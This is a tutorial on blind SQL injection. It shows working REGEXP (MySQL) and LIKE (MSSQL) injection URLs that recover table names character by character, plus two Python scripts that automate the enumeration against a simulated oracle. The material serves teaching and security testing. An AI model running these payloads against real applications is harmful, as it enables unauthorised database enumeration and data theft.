Regular-expression attacks in blind SQL injection

We already know that in MySQL 5+ the names of all databases, tables and columns are stored in the information_schema database.
The attack therefore proceeds as follows:
1. Determine whether the first character of the first table name is in the range a-z; blind_sqli is the database name, assumed to be known already.
Note: ^[a-z] in the regular expression means that the string starts with a character in the range a-z.

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1)/*

2. Determine whether the first character is in the range a-n (halving the range on every query is a binary search over the alphabet)

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*

3. Confirm that the character is n

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1)/*

4. Then extend the expression one character at a time:

'^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE

When '^news[a-z]' returns false, no lowercase letter follows news, so the table name is most likely news. Confirm it with '^news$'; there is no need to test table_name = 'news' directly. Bear in mind that [a-z] does not cover digits or underscores, so a name such as news_2019 (a made-up example) would also stop here; if the '^news$' check fails, continue with a wider class such as '^news[a-z0-9_]'.

5. Next, guess the other tables. One might think it is enough to change LIMIT 0,1 -> LIMIT 1,1 -> LIMIT 2,1 to move on to the next table. This is wrong!

REGEXP is evaluated against every row, and LIMIT only applies to the rows that are left. For example:

The security database contains several tables: users, email, and so on.

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^u[a-z]' limit 0,1); -- true

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1); -- true

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^em[a-z]' limit 0,1); -- true

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 1,1); -- false

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^em[a-z]' limit 1,1); -- false

The experiment shows that under LIMIT 0,1 the REGEXP has already been matched against every table. LIMIT 1,1 does not select "the second table"; it asks whether a second table matches '^us[a-z]', and there is none, so the condition is false. When using REGEXP, remember that several tables may match the same pattern, and the only way to separate them is to brute-force one character at a time for all of them together, as in steps 1 and 2 above, following every branch that returns true ('^u' and '^e' here). The WHERE table_schema='security' clause already restricts which rows are examined; LIMIT 0,1 does not choose among them, it only collapses the filtered result to a single row so that 1=(subquery) cannot fail with "Subquery returns more than 1 row" when several tables match.
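As an added example (not part of the original article), the following Python script implements the procedure of steps 1-5 against a simulated MySQL oracle: `mysql_oracle` answers exactly what `1=(SELECT 1 ... REGEXP ... LIMIT k,1)` would, the next character is found by bisecting the character set as in the '^[a-n]' step, and tables that share a prefix are separated by following every branch that returns true instead of changing the LIMIT offset. The table names, the database name security and the character set are constructed for the demonstration; against a real target, `mysql_oracle` would be replaced by a function that sends the payload and inspects the response.

```python
import re

# Constructed sample data: the table names of a hypothetical "security"
# database, standing in for information_schema.tables. Not real target data.
SAMPLE_TABLES = ["users", "email", "news", "referers", "uagents", "news_2019"]

# Characters to search. The article uses [a-z]; digits and underscore are
# added so that names such as news_2019 can be recovered too. None of these
# is special inside a regex bracket expression.
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"


def mysql_payload(pattern, offset=0, schema="security"):
    """The injected condition from step 1, for reference (single-quoted strings)."""
    return ("1 and 1=(SELECT 1 FROM information_schema.tables "
            f"WHERE table_schema='{schema}' AND table_name REGEXP '{pattern}' "
            f"LIMIT {offset},1)/*")


def mysql_oracle(pattern, offset=0, tables=SAMPLE_TABLES):
    """Simulated truth value of mysql_payload(pattern, offset).

    REGEXP is evaluated against every row first and LIMIT trims what is
    left, so the subquery yields a row (and 1=(...) is true) only when at
    least offset+1 tables match. MySQL's REGEXP is case-insensitive by
    default, hence re.IGNORECASE.
    """
    matching = [t for t in tables if re.search(pattern, t, re.IGNORECASE)]
    return len(matching) > offset


def next_chars(prefix, oracle, candidates=CHARSET):
    """Every character that follows `prefix` in at least one table name.

    One query per candidate set, '^<prefix>[<candidates>]', then recurse into
    each half that still matches: the '^[a-z]' -> '^[a-n]' -> '^n' bisection
    of steps 1-3, extended so that several tables sharing the prefix
    (users and uagents after 'u') are all found.
    """
    if not oracle("^" + re.escape(prefix) + "[" + candidates + "]"):
        return []
    if len(candidates) == 1:
        return [candidates]
    mid = len(candidates) // 2
    return (next_chars(prefix, oracle, candidates[:mid])
            + next_chars(prefix, oracle, candidates[mid:]))


def enumerate_tables(oracle, prefix=""):
    """Depth-first recovery of every table name starting with `prefix`.

    '^<prefix>$' (the '^news$' check of step 4) tells whether the prefix is
    a complete name; it may still continue (news and news_2019), so the
    branches are explored either way. The LIMIT offset is never changed.
    """
    found = []
    if prefix and oracle("^" + re.escape(prefix) + "$"):
        found.append(prefix)
    for c in next_chars(prefix, oracle):
        found.extend(enumerate_tables(oracle, prefix + c))
    return found


def limit_offset_pitfall():
    """Step 5's mistake in numbers: LIMIT 1,1 asks whether a *second* table
    matches the pattern, not what the second table is called."""
    return {
        "^us[a-z] limit 0,1": mysql_oracle("^us[a-z]", 0),  # users matches
        "^us[a-z] limit 1,1": mysql_oracle("^us[a-z]", 1),  # no second match
        "^u[a-z] limit 1,1": mysql_oracle("^u[a-z]", 1),    # users and uagents
    }


if __name__ == "__main__":
    print(enumerate_tables(mysql_oracle))
    print(limit_offset_pitfall())
```

Each bisection costs about log2(len(CHARSET)) queries per character per branch, and a branch is only opened when a query for that character class returned true, so the total number of requests stays proportional to the amount of text recovered rather than to the number of tables times the alphabet.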

-----------------------------------------------MSSQL---------------------------------------------------

The pattern syntax in MSSQL is not a regular expression: the LIKE keyword is used, with % (any run of characters), _ (exactly one character) and [a-z] character classes.

default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_CATALOG='blind_sqli' AND table_name LIKE '[a-z]%')

In this query, TOP 1 1 is TOP 1 followed by the constant 1; don't misread it. Two details differ from the MySQL version: string literals must use single quotes, because with QUOTED_IDENTIFIER ON (the default for most clients) "blind_sqli" is parsed as a column name; and in SQL Server's information_schema.tables the database name is in TABLE_CATALOG, while TABLE_SCHEMA holds the schema, usually dbo.

To query other table names you cannot use LIMIT x,1 as in MySQL; the only option is

table_name NOT IN (SELECT TOP x table_name FROM information_schema.tables)

Meaning: the table name is not among the first x rows, so the query is in effect looking at row x+1 (strictly, at any row after the first x). Add ORDER BY table_name inside the TOP subquery, and filter it by the same database, otherwise SQL Server does not guarantee which rows TOP x sees and the "first x" can change between requests.

For example, to query the table name in the second row:

default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_CATALOG='blind_sqli' AND table_name NOT IN (SELECT TOP 1 table_name FROM information_schema.tables WHERE TABLE_CATALOG='blind_sqli' ORDER BY table_name) AND table_name LIKE '[a-z]%')

The sequence of patterns:

'n[a-z]%' -> 'ne[a-z]%' -> 'new[a-z]%' -> 'news[a-z]%' -> FALSE

'news[a-z]%' is false because [a-z] must consume one character and nothing follows news: % matches 0 to n characters, but _ and a character class each match exactly one. To confirm that no character follows, use

'news%' TRUE -> 'news_' FALSE

'news_' being false only rules out a fifth character; 'news_%' FALSE rules out any further characters at once, so the name is exactly news.
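As an added example (not from the original article), the Python below repeats the extraction for the MSSQL form: a simulated oracle answers whether the (x+1)-th table name, in ORDER BY table_name order, matches a LIKE pattern; the name is grown one character at a time ('n%' -> 'ne%' -> 'new%' -> 'news%'), and '<prefix>_%' FALSE is the stopping condition. It isolates row x+1 with a TOP 1 ... ORDER BY scalar subquery rather than the article's NOT IN form alone (which is true whenever any row after the first x matches). The table names, the database name blind_sqli and the character set are constructed; the simulation assumes a case-insensitive collation and sorts names by code point, whereas a real server orders them by its collation, and the LIKE-to-regex translation handles only %, _ and [...] classes.

```python
import re

# Constructed sample data: table names of a hypothetical blind_sqli database,
# standing in for information_schema.tables. Not real target data.
SAMPLE_TABLES = ["users", "email", "news", "referers", "uagents", "news_2019"]

# Characters to try, scanned in this order; digits and underscore are added
# to the article's [a-z].
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"


def mssql_payload(pattern, x, db="blind_sqli"):
    """Injected condition for 'row x+1 (sorted by name) LIKE pattern'.

    TOP 1 ... ORDER BY isolates exactly one row; the article's NOT IN form is
    true whenever *any* row after the first x matches. Single quotes: with
    QUOTED_IDENTIFIER ON, "blind_sqli" would be parsed as a column name.
    """
    return ("1 AND (SELECT TOP 1 table_name FROM information_schema.tables "
            f"WHERE table_catalog='{db}' AND table_name NOT IN "
            f"(SELECT TOP {x} table_name FROM information_schema.tables "
            f"WHERE table_catalog='{db}' ORDER BY table_name) "
            f"ORDER BY table_name) LIKE '{pattern}'")


def like_to_regex(pattern):
    """Translate a T-SQL LIKE pattern for the simulation: % -> .*, _ -> .,
    a [...] class passes through unchanged, anything else is literal.
    Only these three LIKE features are handled."""
    out, i = [], 0
    while i < len(pattern):
        c = pattern[i]
        if c == "%":
            out.append(".*")
        elif c == "_":
            out.append(".")
        elif c == "[":
            j = pattern.index("]", i)
            out.append(pattern[i:j + 1])
            i = j
        else:
            out.append(re.escape(c))
        i += 1
    return "".join(out)


def mssql_row_oracle(pattern, x, tables=SAMPLE_TABLES):
    """Simulated truth value of mssql_payload(pattern, x).

    Names are compared lower-cased (case-insensitive collation assumed) and
    sorted by code point; a real server orders them by its collation. A
    missing row gives NULL LIKE ..., which is not true.
    """
    ordered = sorted(t.lower() for t in tables)
    if x >= len(ordered):
        return False
    return re.fullmatch(like_to_regex(pattern.lower()), ordered[x]) is not None


def like_literal(s):
    """Escape LIKE metacharacters in a recovered prefix: _ -> [_], % -> [%], [ -> [[]."""
    return "".join("[" + c + "]" if c in "_%[" else c for c in s)


def extract_row(x, oracle):
    """Recover the name of row x+1: grow a LIKE prefix one character at a
    time and stop when '<prefix>_%' is false, i.e. no character follows.
    Returns None when the row does not exist."""
    if not oracle("%", x):
        return None
    name = ""
    while oracle(like_literal(name) + "_%", x):
        for c in CHARSET:
            if oracle(like_literal(name + c) + "%", x):
                name += c
                break
        else:
            raise ValueError(f"character after {name!r} is outside CHARSET")
    return name


def enumerate_rows(oracle):
    """Walk x = 0, 1, 2, ... until there is no row x+1."""
    names, x = [], 0
    while True:
        name = extract_row(x, oracle)
        if name is None:
            return names
        names.append(name)
        x += 1


if __name__ == "__main__":
    print(enumerate_rows(mssql_row_oracle))
```

Note the `like_literal` step: once a recovered prefix contains an underscore (news_2019), it must be sent as [_], or the LIKE wildcard would silently match any character in that position and the extraction would drift.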

Columns and values can be obtained in the same way (information_schema.columns for column names, then the data itself); this is not described in detail here.

 
